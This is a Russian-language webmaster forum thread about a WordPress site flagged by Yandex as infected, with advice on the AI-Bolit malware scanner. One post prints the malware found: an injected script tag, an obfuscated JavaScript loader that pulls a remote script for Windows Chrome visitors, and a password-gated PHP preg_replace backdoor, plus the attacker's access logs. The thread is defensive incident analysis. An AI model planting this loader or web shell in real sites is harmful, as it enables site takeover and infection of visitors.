Яндекс нашел вирус на сайте

A
На сайте с 29.04.2013
Offline
22
#391
kgtu5:
где то на вашем аккаунте хостинга незаметно лежит шелл, с помощью него и вписывают.
ай-болитом проверяли сайты?

Да. Экспресс метод. Полный метод через SSH не получается запустить:

Error: cannot run on php-cgi. Requires php as cli

See FAQ: http://revisium.com/ai/faq.php

В факе ничего об этой ошибке.

Работал по этому мануалу

кспресс-проверка (не рекомендуется):

-------------------------------------

1. в файле /ai-bolit/ai-bolit.php найти строку

define('PASS', '....

Вписать во вторых апострофах пароль, например mypass6.

define('PASS', 'MyPass234');

2. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

3. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

4. открыть в браузере http://ваш_сайт/ai-bolit.php?p=MyPass234 и ждать отчета

5. после отображения отчета удалить файлы от айболита и сам скрипт с сайта

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php

Полная проверка (рекомендуется):

--------------------------------

1. скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог

2. скопировать из папки know_files файлы, которые соответствуют вашей cms (если таких файлов нет, то ничего страшного)

3. подключиться к серверу по ssh, перейти в папку сайта

4. выполнить команду в командной строке

php ai-bolit.php

5. дождаться окончания сканирования

6. скопировать с сервера файл AI-BOLIT-REPORT-<дата>-<время>.html

Если что-то пошло не так, читаем FAQ: http://revisium.com/ai/faq.php

K5
На сайте с 21.07.2010
Offline
209
#392

AAAAllleex, что в отчете?

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
A
На сайте с 29.04.2013
Offline
22
#393
kgtu5:
AAAAllleex, что в отчете?

Всё хорошо.

Вы так и не сказали как нашли:(:(

K5
На сайте с 21.07.2010
Offline
209
#394

AAAAllleex, секрет фирмы....

когда все хорошо, взломов не бывает.

все сайты проверили?

A
На сайте с 29.04.2013
Offline
22
#395
kgtu5:
AAAAllleex, секрет фирмы....
когда все хорошо, взломов не бывает.
все сайты проверили?

Тут народ на хостеров грешит. Однако, всё может быть.

[Удален]
#396
AAAAllleex:
Тут народ на хостеров грешит.

Маловероятно.

A
На сайте с 29.04.2013
Offline
22
#397

Очередное заражение

В файл navigation.js дописали:

document.write("<scr"+"ipt src='/wp-includes/js/mediaelement/candy.js'><"+"/script>");

и добавили файл:

wp-includes/js/mediaelement/candy.js

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 p(f){7(f).o("").n().r("")}5 b(d){k(3.j&&3.a){2 8=3["a"](\'s\')[0];2 4=3.j(\'t\');4.g(\'m\',"l/q");4.g(\'A\',d);8["C"](4)}}2 c="D://u.E.F/B";2 e="w";2 6=v["x"]["y"]();5 9(){7 6["h"](e)!=-1}5 i(){7 6.h("z")==-1}k(i()&&9()){b(c)}',42,42,'||var|document|HHHHVjwZ|function|JvvUnzHH|return|OWEV|jOYumjF|getElementsByTagName|LYXg|dbiq|sTXIqbf|fiJEYWgF|wzvPUChl|setAttribute|indexOf|KpkcHax|createElement|if|text|type|reverse|split|bXKzI|javascript|join|head|script|arreup|navigator|win|userAgent|toLowerCase|chrome|src|2832e2284ebcc386cd95d24cb037a953c9c8a4d04eabf0876b9349044f12b296b3aa647e68b0213fed1f15848a89b02310ad5905681726066009a3cb4baa35d6e190a962788e72bc41ff155027edf37571273924d8b9427a48e6a2222ab00281cb731057ea6ccc4195ca2f116cae5a2bd86613df|appendChild|http|pp|ua'.split('|'),0,{}))

в файле wp-includes/SimplePie/config.inc.php:

<?php

if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);

}

Вот лог использования файла:

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:01:26:54 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:01:26:55 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 213

5.39.47.1 [20/Jan/2014:01:26:59 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:16:06:33 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 65

5.39.47.1 [20/Jan/2014:16:06:34 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 218

5.39.47.1 [20/Jan/2014:16:06:35 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 2

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 51

5.39.47.1 [20/Jan/2014:21:30:42 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 214

5.39.47.1 [20/Jan/2014:21:30:45 +0400] "POST /wp includes/SimplePie/config.inc.php HTTP/1.0" 200 52

atranca
На сайте с 27.02.2011
Offline
126
#398

это и есть бекдор

if (md5($_POST['p']) == 'bf4400fd188a7fca6c65cbb3e5b2d711') {

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);

}

123
R
На сайте с 24.01.2008
Offline
180
#399
AAAAllleex:
Тут народ на хостеров грешит. Однако, всё может быть.

Хостер тоже играет не маловажную роль.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
hexacell
На сайте с 10.12.2010
Offline
65
#400

наша песня хороша, начинай сначала...

снова jquery, снова хост лайф...

Кстати, подскажите кто-нибудь как разрешить метод POST только определенным IP.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий